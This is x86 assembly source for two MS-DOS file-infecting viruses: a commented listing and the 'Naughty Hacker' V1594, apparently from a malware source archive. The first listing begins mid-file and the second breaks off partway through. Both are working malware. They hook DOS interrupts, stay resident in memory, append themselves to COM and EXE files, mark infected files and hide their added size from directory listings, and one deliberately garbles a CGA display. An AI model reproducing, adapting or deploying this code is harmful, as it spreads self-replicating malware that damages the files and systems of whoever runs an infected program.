MOV CS:[BP+offset Int21seg],ax ; Save old vector segment
POP ES ; Set ES point to new virus seg
PUSH CS ; Set DS point to current virus seg (PSP)
POP DS ;
MOV CX,offset LastByte ; Will move all virus
REP MOVSB ; Move virus in hi memory (as Eddie)
MOV AX,4BB4h ; Int21 is grabbed by virus
INT 21 ; This SetUp virus function
ReturnControl:
POP DS ; Restore DS
POP ES ; Restore ES
CMP byte ptr CS:[BP+ComFlag],43 ; Check if host file is COM
JZ ReturnCOM ; If COM -> exit COM
ReturnEXE:
MOV AX,CS:[BP+First3] ; Load AX with old IP
MOV DX,CS:[BP+First3+2] ; Load AX with old CS
MOV CX,CS ; Load CX with current run segment
SUB CX,CS:[BP+06] ; Calculate PSP+10h
MOV DI,CX ; Save result in DI
ADD DX,CX ; In DX is now start segment
POP CX ; ???
POP BX ; ???
CLI ; Disable interrupts
ADD DI,CS:[BP+04]
MOV SS,DI
STI
DoReturn: ; 009B
PUSH DX ; Push entry segment
PUSH AX ; Push entry offset
SUB AX,AX ; Clear registers
SUB DX,DX ; Clear of AX may cause trouble
SUB BP,BP ; with several programs (as DISKCOPY)
SUB SI,SI ; AX must be saved on entry and restored
SUB DI,DI ;
RETF ; Return control to EXE file
ReturnCOM:
POP CX ; ???
POP BX ; ???
MOV AX,[BP+First3] ; Load AX with first 2 instr
MOV [0100],AX ; and restore them at file begin
MOV AX,[BP+First3+2] ; Load AX with second 2 instr
MOV [0102],AX ; and restore them at file begin
MOV AX,0100 ; Set AX to entry offset
MOV DX,CS ; Set DX to entry segment
JMP short DoReturn ; Go to return code
FindFirstNext:
PUSHF ; Save flags
CALL dword ptr CS:[offset Dos21off] ; Call DOS
PUSH BX ; Save rezult of searching
PUSH ES
PUSH SI
PUSH AX
MOV SI,DX ; DS:SI point to FCB with search argument
CMP byte ptr [SI],0FFh ; Check for Extended FCB
JNZ NoDirCommand ; If FCB not extended then command is not DIR
MOV AH,2Fh ; Get DTA address; Result of search is in DTA
INT 21
MOV AX,ES:[BX+1Eh] ; Load file time to AX
AND AX,001Fh ; Mask seconds
CMP AX,001Fh ; Check if file seconds are 62
JNZ NoDirCommand ; If seconds!=62 -> file not infected
CMP ES:[BX+26h],0000 ; Check file size, hi byte
JNZ AdjustSize ; If file bigger than 64K -> immediate adjust
CMP ES:[BX+24h],offset LastCode ; Check low byte of file size
JC NoDirCommand ; If file is less than virus -> skip adjust
AdjustSize:
SUB ES:[BX+24h],offset LastCode ; Decrement file size with virus size
SBB ES:[BX+26h],0000 ; Decrement hi byte of size if need
NoDirCommand:
POP AX ; Restore registers
POP SI
POP ES
POP BX
IRET ; Return to caller
HereIam:
PUSH CS ; If AX==4B4B -> so virus call me
POP ES ; Set ES to virus segment
MOV DI,000C ; Set DI to virus code begin
IRET ; Return to caller
Int21handler:
CMP AH,11h ; If function is FindFirst
JZ FindFirstNext ; If so -> will adjust file size
CMP AH,12h ; If function is FindNext
JZ FindFirstNext ; If so -> will adjust file size
CMP AX,4B4Bh ; If AX==4B4B -> Identification
JZ HereIam ; function
CMP AX,4BB4h ; Setup function
JNZ Continue ; Continue checking of AH
JMP SetUp
Continue:
PUSH AX ; Save important registers
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH BP
PUSH DS
PUSH ES
CMP AH,3Eh ; If function CLOSE file handle
JZ CloseFile ;
CMP AX,4B00h ; If function is EXEC file
MOV AH,3Dh ; If so set AH to OPEN function
JZ Infect ; and infect file
ErrorProcess:
MOV AX,CS:[offset FunCounter] ; Load nomer pored na function
CMP AX,0000 ; If counter is != 0
JNZ AdjustFunCount ; then only decrease counter
JMP VideoFuck ; else go to video fuck
AdjustFunCount:
DEC AX
MOV CS:[04A0h],AX
EndInt21:
POP ES ; Restore important registers
POP DS
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
JMP dword ptr CS:[offset Int21off] ; Jump to DOS
DB 9A ; ??????
CloseFile:
MOV AH,45
Infect:
CALL CallDOS ; Call DOS int 21
JC ErrorProcess ; If error -> Stop processing
MOV BP,AX ; Save file handle in BP
MOV AX,3508 ; Get timer interrupt
CALL CallDOS
MOV CS:[offset TimerOff],BX ; and save it in variable
MOV CS:[offset TimerSeg],ES
PUSH BX ; and to stack
PUSH ES
MOV AL,21 ; Get in21
CALL CallDOS
PUSH BX ; and save it on stack
PUSH ES
MOV AL,24 ; Get critical error int
CALL CallDOS
PUSH BX ; and store it on stack
PUSH ES
MOV AL,13 ; Get int 13 (disk I/O)
CALL CallDOS
PUSH BX ; and save it on stack
PUSH ES
MOV AH,25 ; Now he will SET vectors
LDS DX,dword ptr CS:[offset Int13off] ; Load int13 bios address
CALL CallDOS ; Set it in vector table
MOV AL,21
LDS DX,dword ptr CS:[offset Dos21off] ; Load int21 dos address
CALL CallDOS ; Set in vector table
MOV AL,24 ; Will set critical error handler
PUSH CS
POP DS ; Set DS point to vurus segment
MOV DX,offset CriticalError ; Load its own critical handler
INT 21 ; Set in vector table
MOV AL,08 ; Set new timer
MOV DX,offset TimerHandler ; Load its own timer
INT 21 ; Set in vector table
MOV BX,BP ; Restore file handle from BP to BX
PUSH BX ; Save handle on stack
MOV AX,1220 ; Get handle table number
CALL CallInt2F ; Via int2F (undocumented)
MOV BL,ES:[DI] ; Load table number in BL
MOV AX,1216 ; Get table address
CALL CallInt2F ; Via int2F (undocumented)
POP BX ; Restore file handle
ADD DI,0011 ; ES:DI point to file size
MOV byte ptr ES:[DI-0Fh],02 ; Set file open mode (3Dxx) to Read/Write
MOV AX,ES:[DI] ; Load DX:AX with file size
MOV DX,ES:[DI+02] ;
CMP DX,0000 ; Check if file is less than 64k
JNZ BigEnough ; If less
CMP AX,offset LastCode ; Then check if file is less than virus
JNC BigEnough ; If file is larger than virus -> fuck it
JMP SkipFile ; else skip file
BigEnough:
MOV [offset FileSizeLow],AX ; Save file size in variables
MOV [offset FileSizeHi],DX
SUB AX,offset VirusAuthor-offset EndAuthor ; Decrease file size with sign size
SBB DX,0000 ;
MOV ES:[DI+04],AX ; Set current file position to point
MOV ES:[DI+06],DX ; Virus sign
PUSH DI ; Save table handle table address
PUSH ES ;
MOV AH,3F ; Will read from file
MOV CX,offset EndAuthor-offset VirusAuthor
MOV DX,offset LastByte ; Load DS:DX point AFTER virus
MOV DI,DX ; DI point this area either
INT 21 ; Read file
MOV SI,Offset VirusAuthor ; DS:SI point virus sign
MOV CX,offset EndAuthor-offset VirusAuthor ; Load CX sign size
PUSH CS ; ES:DI point to readed byte
POP ES ;
REP CMPSB ; Compare virus sign with readed bytes
POP ES ; Restore handle table address
POP DI ;
JNZ CleanFile ; If not equal -> file is clean
JMP SkipFile ; Else file infected -> skip it
CleanFile: MOV ES:[DI+04],0000 ; Set file pointer to 0L
MOV ES:[DI+06],0000
MOV AH,3F ; Will read EXE header
MOV CX,001B ; Size of EXE header
MOV DX,offset LastByte ; Read in buffer AFTER virus
MOV SI,DX ; Set DS:SI point to readed header
INT 21 ; Read header
JNC NoErrorHeader ; If no error in read -> go ahead
JMP SkipFile ; If error occur -> skip file
NoErrorHeader: CMP ES:[DI+18],4D4F ; Check in table if file is ?OM
JNZ NoComFile
JMP InfectCOM
NoComFile: CMP ES:[DI+18],4558 ; Check for ?XE file
JZ CheckForEXE ; If so -> infect it
JMP SkipFile ; Else skip file
CheckForEXE: CMP ES:[DI+17],45 ; Check if file is realy an EXE-named
JZ CheckEXEsign ; If so -> check for MZ,ZM
JMP SkipFile ; Else skip file
CheckEXEsign: CMP [SI],5A4Dh ; Check for MZ
JZ InfectEXE ; If so -> infect file
CMP [SI],4D5Ah ; Check for ZM
JZ InfectEXE ; If so -> infect file
JMP SkipFile ; Otherwise -> skip file
InfectEXE: MOV byte ptr [ComFlag],45h ; Set file type flag to EXE
MOV AX,[SI+0Eh] ; Load AX with EXE file SS
MOV [SSegment],AX ; and save it
MOV AX,[SI+14h] ; Load AX with EXE header IP
MOV [IPointer],AX ; and save it
MOV AX,[SI+16h] ; Load AX with EXE header CS
MOV [CSegment],AX ; And save it
MOV DX,offset LastCode ; Load DX with virus CODE size
PUSH DX ; Save it to stack
MOV CX,9h ; Compute virus size in
SHR DX,CL ; 512 pages
ADD [SI+04h],DX ; Increase EXE file header size field
; with virus pages
POP DX ; Restore virus size in DX
AND DX,01FFh ; Compute reminder from VirusSize/512
ADD DX,[SI+02] ; Save value in EXE header
CMP DX,0200 ; Check virus reminder
JL NoAdjustRem ; If less than 512 -> no adjust
SUB DX,0200 ; Else decrease reminder
INC word ptr [SI+04] ; Increase EXE header page count
NoAdjustRem:
MOV [SI+02],DX ; Save correct reminder in EXE header
MOV AX,[SI+08] ; Load AX with file size in paragraphs
SUB DX,DX ; Set DX to Zero
CALL LongMultiple16 ; Get DX:AX file size in bytes
SUB [offset FileSizeLow],AX ; Correct saved file size
SBB [offset FileSizeHi],DX
MOV AX,[FileSizeLow] ; Load DX:AX with corrected file size
MOV DX,[offset FileSizeHi]
CALL LongMultiple16 ; DX:AX *= 0x10
MOV CX,0008 ; Calculate new entry CS:IP
SHL DX,CL ; DX/=0x100
MOV CX,0004
SHR AX,CL ; AX/=0x10
MOV [SI+14],AX ; Set entry CS:IP to EXE header
MOV [SI+16],DX
MOV [NewCS],DX ; Save new entry CS
ADD DX,0200 ; Calculate new entry SS
MOV [SI+0E],DX ; Store it to EXE header
DoInfect:
MOV ES:[DI+04],0000 ; Set file pointer to 0L
MOV ES:[DI+06],0000
PUSH ES:[DI-02] ; Save file date/time on stack
PUSH ES:[DI-04]
SUB CX,CX ; Set CX to 0
XCHG CX,ES:[DI-0Dh] ; Load CX file attrib/set file attrib to 0
PUSH CX ; Save file attrib to stack
MOV AH,40 ; Write file
MOV DX,offset LastByte ; EXE header
MOV CX,001B ; Rewrite modified EXE header
INT 21 ; Do write
JC BadWrite ; If error skip file
MOV AX,ES:[DI] ; Set file pointer
MOV ES:[DI+04],AX
MOV AX,ES:[DI+02] ; to end of file
MOV ES:[DI+06],AX ;
MOV AH,40 ; Will write
SUB DX,DX ; Virus offset
MOV CX,offset LastCode ; Virus size
INT 21 ; Write virus to EXE file
BadWrite:
POP CX ; Restore file attrib from stack
MOV ES:[DI-0Dh],CX ; Set attrib of file
POP CX ; Restore file date/time from stack
POP DX
OR byte ptr ES:[DI-0Bh],40 ; Set DO NOT UPDATE TIME flag in table
JC NoFuckTime ; If write error -> Set normal time
OR CX,001F ; Else set file seconds to 62
NoFuckTime:
MOV AX,5701 ; Set file date/time
INT 21 ; Via int21
SkipFile:
MOV AH,3E ; CloseFile
INT 21
OR byte ptr ES:[DI-0Ch],40 ; ????
SUB AX,AX ; Set DS to 0
MOV DS,AX
POP AX ; Restore int 13 seg
MOV [004E],AX ; Restore vector 13 seg
POP AX ; Restore int 13 off
MOV [004C],AX ; Restore vector 13 off
POP AX ; Restore int 24 seg
MOV [0092],AX ; Restore vector 24 seg
POP AX ; Restore int 24 off
MOV [0090],AX ; Restore vector 24 off
POP AX ; Restore int 21 seg
MOV [0086],AX ; Restore vector 21 seg
POP AX ; Restore int 21 off
MOV [0084],AX ; Restore vector 21 off
POP AX ; Restore int 8 seg
MOV [0022],AX ; Restore vector 8 seg
POP AX ; Restore int 8 off
MOV [0020],AX ; Restore vector 0 off
JMP ErrorProcess ; Update counter
InfectCom:
TEST byte ptr ES:[DI-0Dh],04 ; Check for SYSTEM file
JNZ OkComFile ; If file IS system -> Damage file ?????
PUSH SI ; Save buffer offset
CMP ES:[DI+17],43 ; Check if file ext begin with 'C'
JNZ OkComFile ; If no -> damage file
MOV byte ptr [ComFlag],43 ; Set file type flag to COM
LODSW ; Load first 2 bytes of file
MOV CS:[First3],AX ; And save them
LODSW ; Load seconf 2 bytes of file
MOV CS:[First3+2],AX ; And save them
MOV AX,ES:[DI] ; Load AX with file size
CMP AX,0FA76h ; Check file size
POP SI ; Restore buffer offset
JC OkComFile ; If file is less than 64118 bytes -> OK infect
JMP short SkipFile ; else skip file
OkComFile:
SUB AX,0003 ; Calculate jump argument
MOV byte ptr [SI],0E9h ; Set first instruction to near JMP
MOV [SI+01],AX ; Store JMP argument
JMP DoInfect ; Go write buffer
LongMultiple16:
PUSH CX ; Save CX
MOV CX,0004 ; Will repeat 4 times
DoMult:
SHL AX,1 ; Mult DX:AX * 2
RCL DX,1 ;
LOOP DoMult ; Repeat 4 times -> 2^4 = 16
POP CX ; Restore CX
RET ; Return to caller
SetUp:
MOV AH,52 ; Get DOS's table of table address
INT 21 ; in ES:BX
MOV CS:[Offset TableSegment],es ; Save table segment
; Virus treat this segment as DOS segment
; He assume int21 seg == to DOS segment
; That's why virus will fail on DOS 5.X
CLI ; Disable interrupts
SUB AX,AX ; Set AX to 0
MOV DS,AX ; Set DS point to interrupt vectors
MOV [0004],offset Debugger ; Set vector 1 (trap) offset
MOV [0006],CS ; ; Set vector 1 (trap) seg
MOV AX,[00BC] ; Load int2F off
MOV CS:[offset Int2Foff],AX ; and save it
MOV AX,[00BE] ; Load int2F seg
MOV CS:[offset Int2Fseg],AX ; and save it
STI ; Enable interrupts
PUSHF ; Save flags
PUSHF ; Save flags
POP AX ; Get flags in AX
OR AX,0100 ; Set TF to 1 (trace mode)
PUSH AX ; Put flags back to stack
POPF ; Begin trace
SUB AX,AX ; AX = 0
DEC AH ; AX = FF00 ???
CALL dword ptr [0084] ; Call DOS (trace mode active)
MOV SI,0004 ; SI = 4
MOV DS,SI ; DS = SI = 4
MOV AH,30 ; Get DOS version
INT 21 ; Via int21
CMP AX,1E03 ; Check DOS 3.30
LES AX,[SI+08] ; Load ES:AX with int13 address
JB OkInt13 ; If DOS vers < 3.30 -> ignore BIOS address load/check
LES AX,[0770+SI] ; then load ES:DX with BIOS address of int13
; simulate int2F, AH=13
MOV BX,ES ; BX:AX int13 BIOS address
CMP BX,0C800h ; If int13 seg >= C800
JAE OkInt13 ; Then address is in BIOS, all OK
CLI ; else HALT system
HLT
OkInt13:
MOV CS:[offset Int13off],AX ; Save in13 address
MOV CS:[offset Int13seg],ES
IRET ; Return to caller, setup complete
Debugger:
PUSH BP ; Save BP
MOV BP,SP ; BP point to stack top
PUSH BX ; Save BX
MOV BX,CS:[offset TableSegment] ; Load BX with DOS segment
CMP SS:[BP+04],BX ; Check debugged address
JNZ ContinueDebug ; If not in DOS -> continue
MOV BX,SS:[BP+02] ; else load BX with int21 off
MOV CS:[offset Dos21off],BX ; and save it
AND SS:[BP+06],0FEFFh ; Clear trap flag
ContinueDebug:
POP BX ; Restore BX
POP BP ; Restore BP
IRET ; Continue trace if require or
; continue int21 execution without trace
; Next subroutine fuck you CGA display (don't affect EGA).
; Fucking result could be fix by dos MODE command
VideoFuck:
MOV DX,03D4h ; Select CGA register selector
MOV AL,02 ; Select CRT register 2 (horiz sync)
OUT DX,AL ; Do selection
MOV AL,0FFh ; New sync value
MOV DX,03D5h ; Select CGA register value writer
; This could be INC DX; That save 1 byte
OUT DX,AL ; Fuck horiz sync
JMP EndInt21 ; Terminate int21 request
CallDOS:
PUSHF ; Save flags
CALL dword ptr CS:[offset Dos21off] ; Call ORIGINAL int21
RET ; Return to caller
CallInt2F:
PUSHF ; Save flags
CALL dword ptr CS:[offset Int2Foff] ; Call SAVED int2F
RET ; Return to caller
TimerHandler:
PUSHF ; Save flags
CALL dword ptr CS:[offset TimerOff] ; Call original timer
PUSH AX ; Save AX
PUSH DS ; Save DS
SUB AX,AX ; Set DS to interrupt table
MOV DS,AX
CLI ; Disable interrupts
MOV AX,CS:[offset Int13off] ; Restore int13 address
MOV [004C],AX
MOV AX,CS:[offset Int13seg]
MOV [004E],AX
MOV [0020],offset TimerHandler ; Set int8
MOV [0022],CS
MOV AX,CS:[offset Dos21off] ; Restore int21 address
MOV [0084],AX
MOV AX,CS:[offset TableSegment]
MOV [0086],AX
MOV AX,offset CriticalError ; Set int24
MOV [0090],AX
MOV [0092],CS
STI ; Enable interrupts
POP DS ; Restore DS
POP AX ; Restore AX
IRET ; Terminate timing
CriticalError:
MOV AL,03 ; If critical error
IRET ; then simulate Ignore
VirusAuthor:
db 'Sofia,Feb '
db 27h
db '91 Naughty Hacker.' ; Replace this string with HORSE
EndAuthor:
LastCode label byte ; This is virus in file
Int21off: DW 0 ; Variable area
Int21seg: DW 0 ; NOT writed in file
Int2Foff: DW 0
Int2Fseg: DW 0
TimerOff: DW 0
TimerSeg: DW 0
Int13off: DW 0
Int13seg: DW 0
Dos21off: DW 0
TableSegment: DW 0
FileSizeLow: DW 0
FileSizeHi: dw 0
FunCounter: dw 0 ; Executed function counter
LastByte: label byte ; Memory size of virus
MSDOS/H-Index/Virus.MSDOS.Unknown.horse4.asm
+958
View File
@@ -0,0 +1,958 @@
.radix 16
;*********************************
;* The Naughty Hacker's virus *
;*VERSION 3.1 (And not the last.)*
;* ( V1594 ) *
;* Finished on the 10.04.1991 *
;* *
;* Glad to meet you friend! *
;* *
;*********************************
;
; "It's hard to find a black cat in a dark room, especially if it's not there."
;
; °¥¤ ¢ ± ±²®¨ ®°¨£¨­ «­¨¿ ²¥ª±² ­  V1594 ( ª® ¬®¦¥ ² ª  ¤  ª ¦¥ !@!?!).
; €¢²®°º² (Š®­¿) ¯°¥¤¢ °¨²¥«­® ¯°¥¤³¯°¥¦¤ ¢ ,·¥ ­¥ ¦¥« ¥ ²®§¨ ²¥ª±² ¤  ¡º¤¥
; ¯°®¬¥­¿­ ¯® ­¨ª ªº¢ ­ ·¨­, ­®  ª® ¦¥« ¥²¥ ¤  £® ³±º¢º°¸¥­±²¢ ²¥ ¬®¦¥ ¤ 
; ­ ¯° ¢¨²¥ ²®¢  ­ ¯º«­® ±¢®¡®¤­® ¯°¨ ¥¤¨­±²¢¥­®²® ³±«®¢¨¥, ·¥ ¢ ¯®«³·¥­ ² 
; ­®¢  ¢¥°±¨¿ ­¿¬  ¤  ¨¬  ­¨ª ª¢¨ ° §°³¸¨²¥«­¨ ´³­ª¶¨¨.
; €¢²®°º² ­¥ ¯®¥¬  ­¨ª ª¢  ®²£®¢®°­®±² §  ¹¥²¨ ¯°¨·¨­¥­¨ ®² ‚ˆ“‘€ ......
;
; „  ±¥ ª®¬¯¨«¨°  ­  TURBO ASSEMBLER Ver 1.03B.  ª  ¯®«³·¥­¨¿ ª®¤ ¥ £®²®¢
; §  ±² °²¨° ­¥ ¨ ....
;
; ®§¤° ¢¨ ¤® ¢±¨·ª¨ VIRUSWRITERS !
;
;
; To be continued ...
;
call Start_Virus
mov dx,offset Hellomsg
mov ah,9
int 21
int 20
Hellomsg db 0a,0dh,7,'HI WORLD,GIVE ME COMMAND.COM !!!',0a,0dh,7,'$'
Virus_lenght equ endcode-adjust
alllen equ buffer-adjust
adjust label word
IP_save label word
First_3 Label Byte
;For .COM file here stores
ret
nop
nop
CS_save dw ? ;The first 3 bytes
SP_save dw ?
SS_save dw 0FFFF ;0FFFF For COM files
signature:
db 'N.Hacker' ;It's me the HORSE !!!
date_stamp:
dd 10041991 ;10.04.1991
Run_The_Program:
pop ds ;Restore saved ds,es,ax
pop es ;ds=es=PSP
pop ax
cmp cs:[bp+SS_save-adjust],0FFFF ;Run the infected program
je Run_COM_File
mov ax,ds ;Calculate load segment
add ax,10
mov bx,ax
add ax,cs:[bp+CS_save-adjust] ;Calculate CS value
add bx,cs:[bp+SS_save-adjust] ;Calculate SS value
mov ss,bx ;Run .EXE program
mov sp,word ptr cs:[bp+SP_save-adjust]
push ax
push word ptr cs:[bp+IP_save-adjust]
retf
Run_COM_File:
mov di,100
mov si,bp
movsb ;Restore the first 3 bytes
movsw ;Run .COM program
mov bx,100
push bx
sub bh,bh
ret
;*******************************************************************
; *
; This is the program entry.... *
; *
;*******************************************************************
Start_Virus:
call Get_IP ;This is to get the IP value.
Get_IP:
pop bp ;Get it in BP.
sub bp,Get_IP-adjust ;adjust BP point to the begining
cld ;Clear direction flag
push ax ;Save some registres
push es
push ds
mov es,[2] ;get last segment
mov di,Run_The_Program-adjust ;(last segment=segment of virus)
push ds
push cs
pop ds
mov si,di
add si,bp
mov cx,endcode-Run_The_Program
rep cmpsb ;check if virus is in memory
pop ds
push ds
pop es
je Run_The_Program ;If so then run the program
mov word ptr cs:[bp+handle-adjust],0ffff ;set handle_save
mov ax,ds
dec ax
mov ds,ax ;ds=MCB
sub word ptr [3],80 ;Set block size
sub word ptr [12],80 ;Set last segment
mov es,[12] ;steal some memory (2K)
push cs
pop ds
sub di,di
mov si,bp ;prepare to move in high mem
mov cx,alllen ;will move virus+variables
rep movsb ;copy there
push cs
mov ax,Run_The_Program-adjust
add ax,bp
push ax
push es
mov ax,offset Set_Vectors-adjust ;Set vectors
push ax
retf
Find_First_Next:
call Call_Original_INT_21h ;fuck when do the dir command
push bx
push es
push ax
or al,al
jnz Go_Out_ ;if error
mov ah,2f ;get DTA address
int 21
mov al,byte ptr es:[bx+30d] ;Seconds in al
and al,31d ;Mask seconds
cmp al,60d/2 ;Seconds=60?
jne Go_Out_
mov ax,es:[bx+36d]
mov dx,es:[bx+38d] ;Check File size
cmp ax,Virus_lenght*2
sbb dx,0
jb Go_Out_
Adjust_Size:
sub es:[bx+28d+7+1],Virus_lenght ;Adjust size
sbb es:[bx+28d+2+7+1],0
Go_Out_:
pop ax
pop es ;Return to caller
pop bx
iret
Find_First_Next1:
call Call_Original_INT_21h
pushf
push ax
push bx ;fuck again
push es
jc Go_Out_1
mov ah,2f
int 21
mov al,es:[bx+22d]
and al,31d
cmp al,60d/2
jne Go_Out_1
mov ax,es:[bx+26d]
mov dx,es:[bx+28d]
cmp ax,Virus_lenght*2
sbb dx,0
jb Go_Out_1
Adjust_Size1:
sub es:[bx+26d],Virus_lenght
sbb es:[bx+28d],0
Go_Out_1:
pop es
pop bx
pop ax ; Dummy proc far
popf ; ret 2
db 0ca,2,0 ;retf 2 ; Dummy endp => BUT too long...
;*************************************
; *
; Int 21 entry point. *
; *
;*************************************
INT_21h_Entry_Point:
cmp ah,11
je Find_First_Next ;Find First Next (old)
cmp ah,12
je Find_First_Next
cmp ah,4e ;Find First Next (new)
je Find_First_Next1
cmp ah,4f
je Find_First_Next1
cmp ah,6ch
jne not_create ;Create (4.X)
test bl,1
jz not_create
jnz create
not_create:
cmp ah,3ch ;Create (3.X)
je create
cmp ah,5bh
je create
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov byte ptr cs:[function-adjust],ah
cmp ah,6ch ;Open (4.X)
je create_
cmp ah,3e ;Close
je close_
cmp ax,4b00 ;Exec
je Function_4Bh
cmp ah,17 ;Rename (old)
je ren_FCB
cmp ah,56 ;Rename (new)
je Function_4Bh
cmp ah,43 ;Change attributes
je Function_4Bh
cmp ah,3dh ;Open (3.X)
je open
Return_Control:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
Go_out:
jmp dword ptr cs:[current_21h-adjust] ;go to the old int 21
create_:
or bl,bl ;Create file?
jnz Return_Control
mov dx,si
jmp Function_4Bh
ren_FCB:
cld
inc dx
mov si,dx
mov di,offset buffer-adjust
push di
push cs
pop es ;Convert FCB format Fname into ASCIIZ string
mov cx,8
rep movsb
mov al,'.'
stosb
mov cx,3
rep movsb
sub al,al
stosb
pop dx
push cs
pop ds
jmp Function_4Bh
create:
; cmp word ptr cs:[handle-adjust],0ffff
; jne Go_out
call Call_Original_INT_21h
jc Error
mov word ptr cs:[handle-adjust],ax
jnc Exit_
Error:
mov word ptr cs:[handle-adjust],0ffff ;Useless
Exit_:
; retf 2
db 0ca,2,0
close_:
cmp word ptr cs:[handle-adjust],0ffff
je Return_Control
cmp bx,word ptr cs:[handle-adjust]
jne Return_Control
mov ah,45
call Infect_It
mov word ptr cs:[handle-adjust],0ffff
jmp Return_Control
Function_4Bh:
mov ax,3d00h
open:
call Infect_It
jmp Return_Control
;******************************************
; *
; This infects the programs... *
; *
;******************************************
Infect_It:
call Call_Original_INT_21h ;this is the infecting part
jnc No_error
ret
No_error:
xchg ax,bp
mov byte ptr cs:[flag-adjust],0
mov ah,54
call Call_Original_INT_21h
mov byte ptr cs:[veri-adjust],al
cmp al,1 ;Switch off verify...
jne Go_On_Setting
mov ax,2e00
call Call_Original_INT_21h
Go_On_Setting:
push cs
push cs
pop ds
pop es
mov dx,offset DOS_13h-adjust
mov bx,dx ;Set New DOS int 13h
mov ah,13
call Call_Original_INT_2Fh
mov ax,3513
call Call_Original_INT_21h
push bx
push es
mov word ptr cs:[current_13h-adjust],bx
mov word ptr cs:[current_13h-adjust+2],es
mov ah,25
mov dx,INT_13h_entry-adjust ;Set int 13h
push cs
pop ds
call Call_Original_INT_21h
mov ax,3524
call Call_Original_INT_21h
push bx
push es
mov ah,25
mov dx,INT_24h_entry-adjust ;Set int 24h (Useless maybe...).
call Call_Original_INT_21h
xchg bx,bp
push bx
mov ax,1220
call Call_Original_INT_2Fh
mov bl,es:[di] ;Remember the good old V512 ?
mov ax,1216
call Call_Original_INT_2Fh
pop bx
add di,11
mov byte ptr es:[di-15d],2
mov ax,es:[di]
mov dx,es:[di+2]
cmp ax,Virus_lenght+1
sbb dx,0
jnb Go_on
jmp close
Go_on:
cmp byte ptr cs:[function-adjust],3dh
je Scan_name
cmp byte ptr cs:[function-adjust],6ch
jne Dont_Scan_Name
Scan_name:
push di
add di,0f
mov si,offset fname-adjust ;wasn't that the last opened file?
cld
mov cx,8+3
rep cmpsb
pop di
jne Dont_Scan_Name
jmp close
Dont_Scan_Name:
cmp es:[di+18],'MO'
jne Check_For_EXE ;check for .COM file
cmp byte ptr es:[di+17],'C'
jne Check_For_EXE
jmp com
Check_For_EXE:
cmp es:[di+18],'EX'
jne Not_good ;check for .EXE file
cmp byte ptr es:[di+17],'E'
je Check_For_Valid_EXE
Not_good:
jmp close
Check_For_Valid_EXE:
call Read_First_18
cmp word ptr [si],'ZM'
je Valid_EXE ;check for valid .EXE file
cmp word ptr [si],'MZ'
je Valid_EXE
jmp close
Valid_EXE:
cmp word ptr [si+0c],0ffff ;only low-mem .EXE
je Low_Mem
jmp close
Low_Mem:
mov cx,[si+16]
add cx,[si+8] ;Something common with EDDIE..
mov ax,10
mul cx
add ax,[si+14]
adc dx,0
mov cx,es:[di]
sub cx,ax
xchg cx,ax
mov cx,es:[di+2]
sbb cx,dx
or cx,cx
jnz Not_Infected_EXE ;infected?
cmp ax,(endcode-Start_Virus)
jne Not_Infected_EXE
jmp close
Not_Infected_EXE:
mov ax,[si+10]
mov [SP_save-adjust],ax
mov ax,[si+0e]
mov [SS_save-adjust],ax
mov ax,[si+14]
mov [IP_save-adjust],ax
mov ax,[si+16]
mov [CS_save-adjust],ax ;set the new header
mov ax,es:[di]
mov dx,es:[di+2]
add ax,Virus_lenght
adc dx,0
mov cx,200 ;(C) by Lubo & Jan...
div cx
mov [si+2],dx
or dx,dx
jz OK_MOD
inc ax
OK_MOD:
mov [si+4],ax
mov ax,es:[di]
mov dx,es:[di+2]
mov cx,4
push ax
Compute:
shr dx,1
rcr ax,1
loop Compute
pop dx
and dx,0f
sub ax,[si+8]
add dx,Start_Virus-adjust
adc ax,0
mov [si+14],dx
mov [si+16],ax
add ax,(Virus_lenght)/16d+1
mov [si+0eh],ax
mov [si+10],100
write:
mov ax,5700
call Call_Original_INT_21h
push cx
push dx
sub cx,cx
mov es:[di+4],cx
mov es:[di+6],cx
mov cl,20
xchg cl,byte ptr es:[di-0dh]
push cx
mov ah,40 ;this writes the first few bytes and glues the virus
mov dx,buffer-adjust
mov cx,18
call Call_Original_INT_21h
mov ax,es:[di]
mov es:[di+4],ax
mov ax,es:[di+2]
mov es:[di+6],ax
call Check_For_COMMAND ;(C)
jne Dont_Adjust_Size
sub es:[di+4],Virus_lenght
sbb es:[di+6],0 ;???????????????????????????????
Dont_Adjust_Size:
mov ah,40
sub dx,dx
mov cx,Virus_lenght
call Call_Original_INT_21h
pop cx
mov byte ptr es:[di-0dh],cl
pop dx
pop cx
cmp byte ptr cs:[flag-adjust],0ff
je Set_Time_and_Date
exit:
call Check_For_COMMAND
je Set_Time_and_Date
and cl,11100000b
or cl,60d/2
Set_Time_and_Date:
mov ax,5701
call Call_Original_INT_21h
close:
mov ah,3e
call Call_Original_INT_21h
push es
pop ds
mov si,di
add si,0f
mov di,fname-adjust
push cs
pop es
mov cx,8+3 ;save the fname to a quit place
cld
rep movsb
push cs
pop ds
cmp byte ptr cs:[flag-adjust],0ff
jne Dont_Clear_Buffers
mov ah,0dh ;if error occured->clear disk buffers
call Call_Original_INT_21h
Dont_Clear_Buffers:
les bx,[org_13h-adjust]
lds dx,[org_13h-adjust]
mov ah,13
call Call_Original_INT_2Fh
cmp byte ptr cs:[veri-adjust],1
jne Restore_Vectors
mov ax,2e01
call Call_Original_INT_21h
Restore_Vectors:
sub ax,ax
mov ds,ax
pop [24*4+2]
pop [24*4]
pop [13*4+2]
pop [13*4] ;restore vectors and return
ret
com:
test byte ptr es:[di-0dh],4 ;if it is a system file
jnz Not_OK_COM_File ;I had some problems here with
;V1160 & V1776 (with the ball)
cmp es:[di],65535d-Virus_lenght*2-100
ja Not_OK_COM_File
call Read_First_18
cmp byte ptr [si],0E9
jne OK_COM_file
mov ax,es:[di]
sub ax,[si+1] ;infected?
cmp ax,(endcode-Start_Virus+3)
je Not_OK_COM_File
OK_COM_file:
mov word ptr [SS_save-adjust],0FFFF
push si
lodsb
mov word ptr [First_3-adjust],ax
lodsw
mov word ptr [First_3-adjust+1],ax
pop si
mov ax,es:[di]
add ax,Start_Virus-adjust-3
call Check_For_COMMAND
jne Normally
sub ax,Virus_lenght
Normally:
mov byte ptr [si],0E9
mov word ptr [si+1],ax
jmp write
Not_OK_COM_File:
jmp close
Set_Vectors:
sub ax,ax
mov ds,ax
push [1*4]
